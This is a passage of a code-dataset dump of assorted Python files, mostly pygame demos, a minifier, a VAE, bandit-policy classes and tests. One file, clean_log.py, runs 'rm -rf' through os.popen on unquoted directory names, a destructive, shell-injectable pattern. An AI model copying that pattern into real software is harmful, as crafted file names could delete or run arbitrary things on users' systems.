logging_file)\n","sub_path":"metaconfig/mconf.py","file_name":"mconf.py","file_ext":"py","file_size_in_byte":6158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"290510715","text":"import pygame\n\npygame.init()\n# 创建窗口\nscreen = pygame.display.set_mode((480, 700))\n\n# 绘制背景图像\n# 加载图像\nbg = pygame.image.load(\"./素材/background.png\")\n# 绘制图像\nscreen.blit(bg, (0, 0))\n# screen.blit(bg, (100, 100))\n# 更新屏幕显示\n# pygame.display.update()\n\nhero = pygame.image.load(\"./素材/me1.png\")\n\nscreen.blit(hero, (150, 300))\n\n# 更新屏幕显示\npygame.display.update()\n\n# 创建时钟对象\nclock = pygame.time.Clock()\n\n#记录飞机初始位置\nhero_rect = pygame.Rect(150, 300, 102, 126)\n\nwhile True:\n\n # 可以指定循环体内部的代码执行的频率\n clock.tick(60)\n\n # 修改飞机位置\n hero_rect.y -= 3\n\n # 判断飞机位置\n if hero_rect.y <= -126:\n\n hero_rect.y = 700\n\n # 重新绘制屏幕\n screen.blit(bg, (0, 0))\n\n # 绘制图像\n screen.blit(hero, hero_rect)\n\n # 更新屏幕\n pygame.display.update ()\n\npygame.quit()","sub_path":"项目/飞机大战/6.循环飞行.py","file_name":"6.循环飞行.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"238225972","text":"#!/usr/bin/env python3\nimport sys\nimport os\n\ndef main(path, num_to_keep, split_by):\n traces_dir = os.environ[\"HOME\"] + \"/\" + path\n os.chdir(traces_dir)\n dirs = os.listdir(\".\")\n\n while len(dirs) > 0:\n target = dirs.pop()\n\n if \"xslt\" in target:\n continue\n\n process_list = []\n process_list.append(target)\n keyword = target.split(split_by)[2]\n\n tmp_dirs = dirs.copy()\n for name in dirs:\n if keyword in name:\n process_list.append(name)\n tmp_dirs.remove(name)\n\n dirs = tmp_dirs\n\n process_list = sorted(process_list, key=str.lower)\n\n while len(process_list) > num_to_keep:\n name = process_list.pop(0)\n print(\"rm \" + name)\n os.popen(\"rm -rf \" + name).read()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 4:\n print(\"./clean_log.py <PATH> <# to keep> <split_by>\")\n exit(1)\n main(sys.argv[1], int(sys.argv[2]), sys.argv[3])\n","sub_path":"scripts/clean_log.py","file_name":"clean_log.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"469192063","text":"#!/usr/bin/env python3\n\nimport os\nimport re\nimport sys\nimport tkinter.filedialog\n\n\nALLOWED_EXTENSIONS = ('.css', '.js')\n\n\ndef minify(filename):\n \"\"\"(str)-> None\n Strip spaces the content of the file at the given\n filename and write to a new file named\n filename.min.original_extension\n \"\"\"\n\n basename, ext = os.path.splitext(os.path.basename(filename))\n\n if ext not in ALLOWED_EXTENSIONS:\n print(\"ERROR: unsupported file format\")\n return\n\n pattern = re.compile(r'([\\:\\{\\};])\\s+')\n pattern2 = re.compile(r'[\\s;]([\\{\\}])')\n\n try:\n with open(filename, 'r') as file_to_minify:\n minified_content = pattern.sub(r'\\1', file_to_minify.read())\n minified_content = pattern2.sub(r'\\1', minified_content)\n except IOError:\n print('\\nAn error occurred while processing the file.\\n'\n 'Please verify that you have selected the correct file.\\n')\n\n # add 'min' to the original filename\n new_name = '{}.min{}'.format(basename, ext)\n\n with open(new_name, 'w') as new_file:\n new_file.write(minified_content)\n\n\ndef main():\n if len(sys.argv) == 2:\n to_minify = sys.argv[1]\n else:\n to_minify = tkinter.filedialog.askopenfilename()\n\n minify(to_minify)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tinycss/minifier.py","file_name":"minifier.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"438597496","text":"#Credit the Invent With Python book (http://inventwithpython.com)\n#for doRectsOverlap and isPointInsideRect functions\n\n#used to detect collisions in our game\ndef doRectsOverlap(rect1, rect2):\n for a, b in [(rect1, rect2), (rect2, rect1)]:\n # Check if a's corners are inside b\n if ((isPointInsideRect(a.left, a.top, b)) or\n (isPointInsideRect(a.left, a.bottom, b)) or\n (isPointInsideRect(a.right, a.top, b)) or\n (isPointInsideRect(a.right, a.bottom, b))):\n return True\n\n return False\n\n#used the by the doRectsOverlap function (won't be called directly from game code)\ndef isPointInsideRect(x, y, rect):\n if (x > rect.left) and (x < rect.right) and (y > rect.top) and (y < rect.bottom):\n return True\n else:\n return False\n\nimport pygame, sys\npygame.init()\nscreen = pygame.display.set_mode([640,480])\nblack = [0, 0, 0]\n\n#the game's variables\nball_x = 50\nball_y = 50\nball_radius = 10\nball_color = [222,50,50]\nball_speed_x = 3\nball_speed_y = 5\n\npaddle_x = 200\npaddle_y = 440\npaddle_width = 60\npaddle_height = 20\npaddle_color = [20,180,180]\npaddle_speed = 20\n\nmyfont = pygame.font.SysFont(\"Arial\", 15)\nscore = 0\n\nrunning = True\n#game loop\nwhile running:\n for event in pygame.event.get():\n #check if you've exited the game\n if event.type == pygame.QUIT:\n running = False\n\n if event.type == pygame.MOUSEMOTION:\n coordinates = pygame.mouse.get_pos() #gives (x,y) coordinates\n paddle_x = coordinates[0] - paddle_width/2 #sets the paddle_x variable to the first item in coordinates\n #if the paddle is off the left side bring it back\n if paddle_x < 0:\n paddle_x = 0\n #if the paddle is off the right side bring it back \n if paddle_x > screen.get_width() - paddle_width:\n paddle_x = screen.get_width() - paddle_width\n\n #pause for 20 milliseconds\n pygame.time.delay(20)\n #make the screen completely white\n screen.fill(black)\n\n #move the ball\n ball_y = ball_y + ball_speed_y\n ball_x = ball_x + ball_speed_x\n #check if the ball is off the bottom of the screen\n if ball_y > screen.get_height():\n ball_y = 20\n score = 0\n #check if the ball hit the top of the screen\n if ball_y < ball_radius:\n ball_speed_y = -ball_speed_y\n #check if the ball hit the left side of the screen\n if ball_x < ball_radius:\n ball_speed_x = -ball_speed_x\n #check if the ball hit the right side of the screen\n if ball_x > screen.get_width() - ball_radius:\n ball_speed_x = -ball_speed_x\n\n #create imaginary rectangles around ball and paddle\n ball_rect = pygame.Rect(ball_x-ball_radius, ball_y-ball_radius, ball_radius*2,ball_radius*2) #circles are measured from the center, so have to subtract 1 radius from the x and y\n paddle_rect = pygame.Rect(paddle_x, paddle_y, paddle_width, paddle_height)\n #see if the rectangles overlap\n if doRectsOverlap(ball_rect, paddle_rect):\n #only bounce when the ball is moving down\n if ball_speed_y > 0:\n ball_speed_y = -ball_speed_y\n score = score + 1\n \n\n #draw everything on the screen\n score_label = myfont.render(str(score), 1, pygame.color.THECOLORS['white'])\n screen.blit(score_label, (10, 10))\n pygame.draw.circle(screen, ball_color, [ball_x, ball_y], ball_radius, 0)\n pygame.draw.rect(screen, paddle_color, [paddle_x, paddle_y, paddle_width, paddle_height], 0)\n #update the entire display\n pygame.display.update()\n\n\npygame.quit()\n","sub_path":"Day-6/finished/bounce game.py","file_name":"bounce game.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"590234750","text":"import torch\nfrom torch import nn\n\ndevice = torch.device(\"cuda:0\")\n\nclass NegativeELBO(nn.Module):\n\n def __init__(self):\n super(NegativeELBO,self).__init__()\n\n def forward(self,x,x_hat,mean,log_variance):\n\n divergence = - (1+ log_variance - mean**2 - log_variance.exp()).sum()/2\n reconstruction_error = ((x-x_hat)**2).sum()\n\n return divergence + reconstruction_error\n\nclass Encoder(nn.Module):\n\n def __init__(self,inp_dim=784,z_dim=32):\n super(Encoder,self).__init__()\n self.relu = nn.ReLU()\n \n self.layer1 = nn.Linear(inp_dim,256)\n self.layer2 = nn.Linear(256,144)\n\n self.mean = nn.Linear(144,32)\n self.log_variance = nn.Linear(144,32)\n\n def forward(self,x):\n\n x = self.relu(self.layer1(x))\n x = self.relu(self.layer2(x))\n\n mean = self.mean(x)\n log_var = self.log_variance(x)\n\n return mean,log_var\n\nclass Decoder(nn.Module):\n\n def __init__(self,out_dim=784,z_dim=32):\n super(Decoder,self).__init__()\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n \n self.layer1 = nn.Linear(z_dim,144)\n self.layer2 = nn.Linear(144,256)\n self.layer3 = nn.Linear(256,out_dim)\n\n def forward(self,x):\n\n x = self.relu(self.layer1(x))\n x = self.relu(self.layer2(x))\n x = self.sigmoid(self.layer3(x))\n\n return x\n\n\nclass VAE(nn.Module):\n\n def __init__(self,inp_dim=784,z_dim=32):\n super(VAE,self).__init__()\n\n self.encoder = Encoder(inp_dim=inp_dim,z_dim=z_dim)\n self.decoder = Decoder(out_dim=inp_dim,z_dim=z_dim)\n\n def reparameterize(self,mean,log_variance):\n\n deviation = torch.exp(log_variance/2)\n eta = torch.randn(deviation.shape,\n device=deviation.device,\n layout=deviation.layout,\n dtype=deviation.dtype\n ) \n\n z = mean + deviation*eta\n return z\n\n def forward(self,x):\n mean,log_variance = self.encoder(x)\n z = self.reparameterize(mean,log_variance)\n self.z_dim = z.shape\n out = self.decoder(z)\n return out,mean,log_variance\n\n def generate(self,count=1,device=device):\n random = torch.randn(self.z_dim)\n image = self.decoder(random)\n return image\n","sub_path":"models/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"562606370","text":"##movimiento de imagen\nfrom tkinter import *\n\ntk = Tk()\ncont=170\ncanvas = Canvas(tk, width=800, height=300)\ncanvas.pack()\nmy_image2 = PhotoImage(file=\"arco.gif\")\ncanvas.create_image(0,0,anchor=NW, image=my_image2)\nmy_image = PhotoImage(file=\"balon.gif\")\ncanvas.create_image(550,0,anchor=NW, image=my_image)\n\ndef moveimage(event):\n global cont \n if event.keysym == 'Left':\n canvas.move(2, -2, 0)\n cont =cont-1\n print (cont)\n if cont ==0:\n print (\"gol\")\n b1=Button(canvas,text=\"GOL\") # Primer botón\n b1.pack()\n else:\n canvas.move(2, 2, 0)\n \ncanvas.bind_all('<KeyPress-Left>', moveimage)\ncanvas.bind_all('<KeyPress-Right>', moveimage)\ntk.mainloop()\n\n","sub_path":"Prueba_gol/prueba_gol.py","file_name":"prueba_gol.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"77144482","text":"# Copyright (c) Yuta Saito, Yusuke Narita, and ZOZO Technologies, Inc. All rights reserved.\n# Licensed under the Apache 2.0 License.\n\n\"\"\"Base Interfaces for Bandit Algorithms.\"\"\"\nfrom abc import ABCMeta, abstractmethod\nfrom dataclasses import dataclass\nfrom typing import Optional, Tuple\n\nimport numpy as np\nfrom sklearn.base import clone, ClassifierMixin, is_classifier\nfrom sklearn.utils import check_random_state\n\nfrom ..utils import check_bandit_feedback_inputs\n\n\n@dataclass\nclass BaseContextFreePolicy(metaclass=ABCMeta):\n \"\"\"Base class for context-free bandit policies.\n\n Parameters\n ----------\n n_actions: int\n Number of actions.\n\n len_list: int, default: 1\n Length of a list of recommended actions in each impression.\n When Open Bandit Dataset is used, 3 should be set.\n\n batch_size: int, default: 1\n Number of samples used in a batch parameter update.\n\n random_state: int, default: None\n Controls the random seed in sampling actions.\n\n \"\"\"\n\n n_actions: int\n len_list: int = 1\n batch_size: int = 1\n random_state: Optional[int] = None\n\n def __post_init__(self) -> None:\n \"\"\"Initialize Class.\"\"\"\n assert self.n_actions > 1 and isinstance(\n self.n_actions, int\n ), f\"n_actions must be an integer larger than 1, but {self.n_actions} is given\"\n assert self.len_list > 0 and isinstance(\n self.len_list, int\n ), f\"len_list must be a positive integer, but {self.len_list} is given\"\n assert self.batch_size > 0 and isinstance(\n self.batch_size, int\n ), f\"batch_size must be a positive integer, but {self.batch_size} is given\"\n\n self.n_trial = 0\n self.random_ = check_random_state(self.random_state)\n self.action_counts = np.zeros(self.n_actions, dtype=int)\n self.action_counts_temp = np.zeros(self.n_actions, dtype=int)\n self.reward_counts_temp = np.zeros(self.n_actions)\n self.reward_counts = np.zeros(self.n_actions)\n\n @property\n def policy_type(self) -> str:\n \"\"\"Type of the bandit policy.\"\"\"\n return \"contextfree\"\n\n def initialize(self) -> None:\n \"\"\"Initialize Parameters.\"\"\"\n self.n_trial = 0\n self.random_ = check_random_state(self.random_state)\n self.action_counts = np.zeros(self.n_actions, dtype=int)\n self.action_counts_temp = np.zeros(self.n_actions, dtype=int)\n self.reward_counts_temp = np.zeros(self.n_actions)\n self.reward_counts = np.zeros(self.n_actions)\n\n @abstractmethod\n def select_action(self) -> np.ndarray:\n \"\"\"Select a list of actions.\"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def update_params(self, action: int, reward: float) -> None:\n \"\"\"Update policy parameters.\"\"\"\n raise NotImplementedError\n\n\n@dataclass\nclass BaseContextualPolicy(metaclass=ABCMeta):\n \"\"\"Base class for contextual bandit policies.\n\n Parameters\n ----------\n dim: int\n Number of dimensions of context vectors.\n\n n_actions: int\n Number of actions.\n\n len_list: int, default: 1\n Length of a list of recommended actions in each impression.\n When Open Bandit Dataset is used, 3 should be set.\n\n batch_size: int, default: 1\n Number of samples used in a batch parameter update.\n\n alpha_: float, default: 1.\n Prior parameter for the online logistic regression.\n\n lambda_: float, default: 1.\n Regularization hyperparameter for the online logistic regression.\n\n random_state: int, default: None\n Controls the random seed in sampling actions.\n\n \"\"\"\n\n dim: int\n n_actions: int\n len_list: int = 1\n batch_size: int = 1\n alpha_: float = 1.0\n lambda_: float = 1.0\n random_state: Optional[int] = None\n\n def __post_init__(self) -> None:\n \"\"\"Initialize class.\"\"\"\n assert self.dim > 0 and isinstance(\n self.dim, int\n ), f\"dim must be a positive integer, but {self.dim} is given\"\n assert self.n_actions > 1 and isinstance(\n self.n_actions, int\n ), f\"n_actions must be an integer larger than 1, but {self.n_actions} is given\"\n assert self.len_list > 0 and isinstance(\n self.len_list, int\n ), f\"len_list must be a positive integer, but {self.len_list} is given\"\n assert self.batch_size > 0 and isinstance(\n self.batch_size, int\n ), f\"batch_size must be a positive integer, but {self.batch_size} is given\"\n\n self.n_trial = 0\n self.random_ = check_random_state(self.random_state)\n self.alpha_list = self.alpha_ * np.ones(self.n_actions)\n self.lambda_list = self.lambda_ * np.ones(self.n_actions)\n self.action_counts = np.zeros(self.n_actions, dtype=int)\n self.reward_lists = [[] for _ in np.arange(self.n_actions)]\n self.context_lists = [[] for _ in np.arange(self.n_actions)]\n\n @property\n def policy_type(self) -> str:\n \"\"\"Type of the bandit policy.\"\"\"\n return \"contextual\"\n\n def initialize(self) -> None:\n \"\"\"Initialize policy parameters.\"\"\"\n self.n_trial = 0\n self.random_ = check_random_state(self.random_state)\n self.action_counts = np.zeros(self.n_actions, dtype=int)\n self.reward_lists = [[] for _ in np.arange(self.n_actions)]\n self.context_lists = [[] for _ in np.arange(self.n_actions)]\n\n @abstractmethod\n def select_action(self, context: np.ndarray) -> np.ndarray:\n \"\"\"Select a list of actions.\"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def update_params(self, action: float, reward: float, context: np.ndarray) -> None:\n \"\"\"Update policy parameters.\"\"\"\n raise NotImplementedError\n\n\n@dataclass\nclass BaseOffPolicyLearner(metaclass=ABCMeta):\n \"\"\"Base Class for off-policy learner with OPE estimators.\n\n Parameters\n -----------\n base_model: ClassifierMixin\n Machine learning classifier to be used to train an offline decision making policy.\n\n n_actions: int\n Number of actions.\n\n len_list: int, default: 1\n Length of a list of recommended actions in each impression.\n When Open Bandit Dataset is used, 3 should be set.\n\n Reference\n -----------\n Miroslav Dudík, Dumitru Erhan, John Langford, and Lihong Li.\n \"Doubly Robust Policy Evaluation and Optimization.\", 2014.\n\n \"\"\"\n\n base_model: ClassifierMixin\n n_actions: int\n len_list: int = 1\n\n def __post_init__(self) -> None:\n \"\"\"Initialize class.\"\"\"\n assert is_classifier(self.base_model), \"base_model must be a classifier.\"\n assert self.n_actions > 1 and isinstance(\n self.n_actions, int\n ), f\"n_actions must be an integer larger than 1, but {self.n_actions} is given\"\n assert self.len_list > 0 and isinstance(\n self.len_list, int\n ), f\"len_list must be a positive integer, but {self.len_list} is given\"\n self.base_model_list = [\n clone(self.base_model) for _ in np.arange(self.len_list)\n ]\n\n @property\n def policy_type(self) -> str:\n \"\"\"Type of the bandit policy.\"\"\"\n return \"offline\"\n\n @abstractmethod\n def _create_train_data_for_opl(\n self,\n context: np.ndarray,\n action: np.ndarray,\n reward: np.ndarray,\n pscore: Optional[np.ndarray] = None,\n ) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n \"\"\"Create training data for off-policy learning.\n\n Parameters\n -----------\n context: array-like, shape (n_actions,)\n Context vectors in the given training logged bandit feedback.\n\n action: array-like, shape (n_actions,)\n Selected actions by behavior policy in the given training logged bandit feedback.\n\n reward: array-like, shape (n_actions,)\n Observed rewards in the given training logged bandit feedback.\n\n pscore: Optional[np.ndarray], default: None\n Propensity scores, the probability of selecting each action by behavior policy,\n in the given training logged bandit feedback.\n\n Returns\n --------\n (X, sample_weight, y): Tuple[np.ndarray, np.ndarray, np.ndarray]\n Feature vectors, sample weights, and outcome for training the base machine learning model.\n\n \"\"\"\n raise NotImplementedError\n\n def fit(\n self,\n context: np.ndarray,\n action: np.ndarray,\n reward: np.ndarray,\n pscore: Optional[np.ndarray] = None,\n position: Optional[np.ndarray] = None,\n ) -> None:\n \"\"\"Fits the offline bandit policy according to the given logged bandit feedback data.\n\n Parameters\n -----------\n context: array-like, shape (n_rounds, dim_context)\n Context vectors in the given training logged bandit feedback.\n\n action: array-like, shape (n_rounds,)\n Selected actions by behavior policy in the given training logged bandit feedback.\n\n reward: array-like, shape (n_rounds,)\n Observed rewards in the given training logged bandit feedback.\n\n pscore: array-like, shape (n_rounds,), default: None\n Propensity scores, the probability of selecting each action by behavior policy,\n in the given training logged bandit feedback.\n\n position: array-like, shape (n_rounds,), default=None\n Positions of each round in the given training logged bandit feedback.\n If None is given, a learner assumes that there is only one position.\n When `len_list` > 1, position has to be set.\n\n \"\"\"\n check_bandit_feedback_inputs(\n context=context,\n action=action,\n reward=reward,\n pscore=pscore,\n position=position,\n )\n if pscore is None:\n n_actions = np.int(action.max() + 1)\n pscore = np.ones_like(action) / n_actions\n if position is None:\n assert self.len_list == 1, \"position has to be set when len_list is 1\"\n position = np.zeros_like(action)\n for position_ in np.arange(self.len_list):\n X, sample_weight, y = self._create_train_data_for_opl(\n context=context[position == position_],\n action=action[position == position_],\n reward=reward[position == position_],\n pscore=pscore[position == position_],\n )\n self.base_model_list[position_].fit(X=X, y=y, sample_weight=sample_weight)\n\n def predict(self, context: np.ndarray) -> None:\n \"\"\"Predict best action for new data.\n\n Parameters\n -----------\n context: array-like, shape (n_rounds_of_new_data, dim_context)\n Observed context vector for new data.\n\n Returns\n -----------\n action_dist: array-like, shape (n_rounds_of_new_data, n_actions, len_list)\n Predicted best action for new data.\n The resulting distribution is deterministic.\n\n \"\"\"\n assert (\n isinstance(context, np.ndarray) and context.ndim == 2\n ), \"context must be 2-dimensional ndarray\"\n n_rounds_of_new_data = context.shape[0]\n action_dist = np.zeros((n_rounds_of_new_data, self.n_actions, self.len_list))\n for position_ in np.arange(self.len_list):\n predicted_actions_for_the_position = (\n self.base_model_list[position_].predict(context).astype(int)\n )\n action_dist[\n np.arange(n_rounds_of_new_data),\n predicted_actions_for_the_position,\n np.ones(n_rounds_of_new_data, dtype=int) * position_,\n ] = 1\n return action_dist\n\n def predict_proba(self, context: np.ndarray) -> None:\n \"\"\"Predict probabilities of each action being the best one for new data.\n\n Parameters\n -----------\n context: array-like, shape (n_rounds_of_new_data, dim_context)\n Observed context vector for new data.\n\n Returns\n -----------\n action_dist: array-like, shape (n_rounds_of_new_data, n_actions)\n Probability estimates of each arm being the best one for new data.\n The returned estimates for all classes are ordered by the label of classes.\n\n \"\"\"\n assert (\n isinstance(context, np.ndarray) and context.ndim == 2\n ), \"context must be 2-dimensional ndarray\"\n n_rounds_of_new_data = context.shape[0]\n action_dist = np.zeros((n_rounds_of_new_data, self.n_actions, self.len_list))\n for position_ in np.arange(self.len_list):\n predicted_probas_for_the_position = self.base_model_list[\n position_\n ].predict_proba(context)\n action_dist[:, :, position_] = predicted_probas_for_the_position\n return action_dist\n","sub_path":"obp/policy/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":12909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"149582981","text":"# keras regresssion\nimport numpy as np \nnp.random.seed(1337)\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nimport matplotlib.pyplot as plt\n\n# create data #\nX = np.linspace(-3,3,100)\nnp.random.shuffle(X)\nY = 0.5 * X + 2 + np.random.normal(0,0.05,(100,))\nsize = len(X)\n\n\n# split into train/test\nX_train, X_test = X[:int(size*0.8)], X[int(size*0.8):]\nY_train, Y_test = Y[:int(size*0.8)], Y[int(size*0.8):]\n\n# build neural network \nmodel = Sequential()\nmodel.add(Dense(input_dim=1,output_dim=1))\n\n# create your own loss funciotn\ndef my_own_loss_function(y_true, y_pred):\n\t# mean square error\n\tcce = np.abs(y_true-y_pred)\n\treturn cce\n\n# choose loss function and optimize\nmodel.compile(loss=my_own_loss_function, optimizer='adam')\n\n\n#training\nprint('Training -------')\nfor step in range(3001):\n\tcost = model.train_on_batch(X_train, Y_train)\n\tif step % 100 == 0:\n\t\tprint('train cost : ', cost)\n\nprint('Testing -------')\ncost = model.evaluate(X_test, Y_test, batch_size=int(size*0.2))\nprint('Test cost:', cost)\n\nW, b = model.layers[0].get_weights()\nprint('Weights=',W,'\\nbiases=',b)\n\nY_pred = model.predict(X_test)\n\nplt.scatter(X_test, Y_test)\nplt.plot(X_test,Y_pred)\nplt.show()","sub_path":"keras_regressionXY.py","file_name":"keras_regressionXY.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"154340656","text":"import string\n\n# print(string.ascii_lowercase)\n\n# print(string.ascii_uppercase)\n\n# print(string.punctuation)\n\n\n\n# ciph['newkey'] = 'newvalue'\n\n\n# def ciph(i):\n# # for i in string.ascii_lowercase:\n# ikey = i\n# ival_id = string.ascii_lowercase.index(i)\n# ival = string.ascii_lowercase[(ival_id + 2) % 26]\n# print(ikey)\n# print(ival_id)\n# print(ival)\n\nmessage = 'a, c'\n\nclass Message(object):\n\n def build(self, shift):\n self.ciph = {}\n for letter in string.ascii_lowercase:\n ival_id = string.ascii_lowercase.index(letter)\n ival = string.ascii_lowercase[(ival_id + shift) % 26]\n self.ciph[letter] = ival\n\n for letter in string.ascii_uppercase:\n jval_id = string.ascii_uppercase.index(letter)\n jval = string.ascii_uppercase[(jval_id + shift) % 26]\n self.ciph[letter] = jval\n return self.ciph\n\n\n\n def apply(self, shift):\n inst = Message()\n ciph = inst.build(shift)\n new = []\n for letter in message:\n if letter in ciph:\n # self.ciph: \n x = ciph.get(letter)\n new.append(x)\n else:\n new.append(letter)\n return ''.join(new)\n\n\ninst2 = Message()\nprint(inst2.apply(2))\n\n# inst = Message()\n# print(inst.build(2))\n# print(inst.apply('a, c'))\n\n# have to call instance of build method in apply apply method \n# run without print(inst.build(2)) to check what happens\n# convert the result into a string.\n\n\n","sub_path":"Problems/wk6/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"622193796","text":"import logging\nimport os\nimport traceback\nimport tempfile\nfrom base_test_case import BaseTestCase\nfrom pbinternal2.analysis.yield_plots import run_yield_plots, run_alignment_yield_plot\nfrom pbinternal2.models import AnalysisConditions\nfrom matplotlib.figure import Figure as fig\nfrom pbinternal2.util.range import Range, Ranges, OverlappingRanges\nfrom base_test_case import get_temp_file, get_pkg_data_file\n\nlog = logging.getLogger(__name__)\n\nclass TestYieldPlots(BaseTestCase):\n \"\"\"Unit and integration tests for analysis yield_plots\"\"\"\n\n def setUp(self):\n \"\"\"\n Before *every* test\n \"\"\"\n try:\n BaseTestCase.setUp(self)\n except Exception as err:\n log.error(err)\n tb = traceback.format_exc()\n log.error(tb)\n raise\n log.debug(\"In setUp()\")\n self.output = tempfile.mkdtemp(suffix=\"yield_plots\")\n\n def tearDown(self):\n \"\"\"\n After *every* test\n \"\"\"\n try:\n BaseTestCase.tearDown(self)\n except Exception as err:\n log.error(err)\n tb = traceback.format_exc()\n log.error(tb)\n raise\n def test_run_e2e_yield_plots(self):\n conditions = get_pkg_data_file(\"conditions_hello_world.json\")\n output = os.path.join(self.output, \"yield_plot_report.json\")\n rcode = run_yield_plots(conditions, output)\n self.assertIs(rcode, 0)\n\n def test_yield_plots(self):\n conditions = get_pkg_data_file(\"conditions_hello_world.json\")\n c = AnalysisConditions.load_conditions_from(conditions)\n figure = run_alignment_yield_plot(c)\n self.assertIsInstance(type(figure), type(fig))","sub_path":"tests/test_pbinternal2_analysis_yield_plots.py","file_name":"test_pbinternal2_analysis_yield_plots.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"208302558","text":"class Solution:\n def subarraysWithKDistinct(self, nums: List[int], k: int) -> int:\n visited = {}\n window = deque([])\n unique = ans = 0\n left = -1\n for i, num in enumerate(nums):\n if num not in visited:\n unique += 1\n window.append((num, i))\n visited[num] = i\n while window and window[0][1] != visited[window[0][0]]:\n window.popleft()\n if unique > k:\n remove, left = window.popleft()\n visited.pop(remove)\n unique -= 1\n while window and window[0][1] != visited[window[0][0]]:\n window.popleft()\n if unique == k:\n ans += window[0][1]-left\n return ans\n\nclass Solution:\n def subarraysWithKDistinct(self, A, K):\n return self.atMostK(A, K) - self.atMostK(A, K - 1)\n\n def atMostK(self, A, K):\n count = Counter()\n res = i = 0\n for j in range(len(A)):\n if count[A[j]] == 0: K -= 1\n count[A[j]] += 1\n while K < 0:\n count[A[i]] -= 1\n if count[A[i]] == 0: K += 1\n i += 1\n res += j - i + 1\n return res\n ","sub_path":"992. Subarrays with K Different Integers.py","file_name":"992. Subarrays with K Different Integers.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"20816891","text":"class EmptyFileError(Exception):\n pass\n\nmy_file=open(\"myfile1\",\"w+\")\nfor i in range(11):\n my_file.write(str(i)+\" \")\nmy_file.close()\n\nfilenames=[\"myfile1\",\"nonExistent\",\"emptyFile\",\"myfile2\"]\nfor file in filenames:\n try:\n f=open(file,'r')\n linea=f.readline()\n if linea==\"\":\n f.close()\n raise EmptyFileError(\"%s: is empty\"%file)\n except IOError as error:\n print(\"%s: could not be opened: %s\"%(file,error.strerror))\n except EmptyFileError as error:\n print(error)\n else: #Se ejecuta si no pasa por excepts\n print(\"%s: %s\"%(file,linea))\n finally: #Se ejecuta siempre\n print(\"Done processing\",file)\n \n","sub_path":"PYTHON/PythonManning/PythonManningBook/intro/Excepciones.py","file_name":"Excepciones.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"298811026","text":"from typing import Any, Dict\n\nimport pytest\nimport requests\n\nfrom schemathesis import models\nfrom schemathesis.runner.checks import content_type_conformance, response_schema_conformance\nfrom schemathesis.schemas import BaseSchema\n\n\ndef make_test_result(schema: BaseSchema, definition: Dict[str, Any]) -> models.TestResult:\n endpoint = models.Endpoint(\"/path\", \"GET\", definition=definition)\n return models.TestResult(endpoint, schema)\n\n\ndef make_response(content=b\"{}\", content_type=\"application/json\") -> requests.Response:\n response = requests.Response()\n response._content = content\n response.status_code = 200\n response.headers[\"Content-Type\"] = content_type\n return response\n\n\n@pytest.fixture()\ndef response(request):\n return make_response(content_type=request.param)\n\n\n@pytest.fixture()\ndef results(request, swagger_20) -> models.TestResult:\n return make_test_result(swagger_20, {\"produces\": request.param})\n\n\n@pytest.mark.parametrize(\n \"response, results\",\n (\n (\"application/json\", []),\n (\"application/json\", [\"application/json\"]),\n (\"application/json;charset=utf-8\", [\"application/json\"]),\n ),\n indirect=[\"response\", \"results\"],\n)\ndef test_content_type_conformance_valid(response, results):\n assert content_type_conformance(response, results) is None\n\n\n@pytest.mark.parametrize(\n \"response, results\",\n ((\"plain/text\", [\"application/json\"]), (\"plain/text;charset=utf-8\", [\"application/json\"])),\n indirect=[\"response\", \"results\"],\n)\ndef test_content_type_conformance_invalid(response, results):\n message = (\n f\"^Received a response with '{response.headers['Content-Type']}' Content-Type, \"\n \"but it is not declared in the schema.\\n\\nDefined content types: application/json$\"\n )\n with pytest.raises(AssertionError, match=message):\n content_type_conformance(response, results)\n\n\nSUCCESS_SCHEMA = {\"type\": \"object\", \"properties\": {\"success\": {\"type\": \"boolean\"}}, \"required\": [\"success\"]}\n\n\n@pytest.mark.parametrize(\n \"content, definition\",\n (\n (b'{\"success\": true}', {}),\n (b'{\"success\": true}', {\"responses\": {\"200\": {\"description\": \"text\"}}}),\n (b'{\"random\": \"text\"}', {\"responses\": {\"200\": {\"description\": \"text\"}}}),\n (b'{\"success\": true}', {\"responses\": {\"200\": {\"description\": \"text\", \"schema\": SUCCESS_SCHEMA}}}),\n (b'{\"success\": true}', {\"responses\": {\"default\": {\"description\": \"text\", \"schema\": SUCCESS_SCHEMA}}}),\n ),\n)\ndef test_response_schema_conformance(swagger_20, content, definition):\n response = make_response(content)\n results = 